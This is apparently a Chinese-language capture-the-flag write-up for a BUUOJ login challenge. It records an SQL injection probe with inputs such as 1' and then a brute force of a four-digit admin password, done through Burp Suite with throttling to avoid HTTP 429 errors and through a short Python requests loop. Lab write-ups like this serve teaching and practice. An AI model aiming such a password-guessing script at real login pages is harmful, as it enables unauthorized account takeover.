方法一：

用户名用1，1'等语句均回显用户名错误，大概率不存在注入。
用admin登录给出提示密码为四位数字。
因此直接用bp直接爆破0000-9999
负载设置为1，大于2都会出现429错误导致爆破失败

然后开始攻击，最后对比length值，与其他长度不同则为爆破成功的密码

正确密码为6490。拿到flag。

方法二：

写（搬运）一个小脚本，同样是爆破。优点是爆破快，不会报429。

import requests
url = "http://ee153233-2a6f-46e3-bd2b-90f973d345a0.node4.buuoj.cn:81/?username=admin&password="
for i in range(6400, 7000):
    res = requests.get(url + str(i))
    print("[*] Try:", i)
    if res.text != "密码错误，为四位数字。":
        print(res.text)
        break